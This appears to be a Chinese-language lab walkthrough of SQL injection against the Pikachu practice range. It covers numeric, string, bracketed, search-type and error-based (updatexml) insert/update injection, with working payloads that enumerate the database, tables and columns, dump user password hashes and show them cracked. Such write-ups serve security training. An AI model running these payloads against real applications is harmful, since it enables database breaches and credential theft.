id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2
发现order by 3 报错,order by2 正常,字段数就是2
正常走流程爆库
id=1 union select 1,database()#
pikachu
爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
爆字段
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#
id,userid,ipaddress,useragent,httpaccept,remoteport,id,username,pw,sex,phonenum,address,email,id,content,time,id,username,password,level,id,time,content,name
下面就是字段里的数据了
1 union select username,password from users#
e10adc3949ba59abbe56e057f20f883e
670b14728ad9902aecba32e22fa4f6bd
e99a18c428cb38d5f260853678922e03
像是md5解码,md5在线解密下
123456
000000
abc123
字符型注入
看一下源码,需要考虑闭合是单引号
输入万能注入,有变化证明语句正确
1' or 1=1#
判断字段数,道理同数字型注入
1' order by 2#
爆库
1' union select 1,database()#
pikachu
爆表
1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
爆字段
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
爆值
1' union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
同理用md5解密
XX型注入
查看源码,单引号和括号
尝试一下
1') or 1=1#
成功了,按照流程继续
爆库
1') union select 1,database()#
pikachu
爆表
1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
爆字段
1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
爆值
1') union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
搜索型注入
查看源码,单引号和百分号
1%' or 1=1#
成功了,那还是老流程
判断字段数,这个是到4才显示错误
1%' order by 4#
字段数就是3了
爆库
1%' union select 1,2,database()#
pikachu
爆表
1%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
爆字段
1%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
爆值
1%' union select username,password,3 from users#
username:admin
uid:e10adc3949ba59abbe56e057f20f883e
email is: 3
username:pikachu
uid:670b14728ad9902aecba32e22fa4f6bd
email is: 3
username:test
uid:e99a18c428cb38d5f260853678922e03
email is: 3
"insert/update"注入
查看源码,会对字符进行转义,联合注入就不能用了,进行报错注入
bp在注册界面抓包,爆库
1' or updatexml(1,concat(0x7e,database()),1) or'
爆表
1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) or'
爆字段
1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) or'
爆值
1' or updatexml(1,concat(0x7e,(select group_concat(username,'@',password)from pikachu.users)),1) or'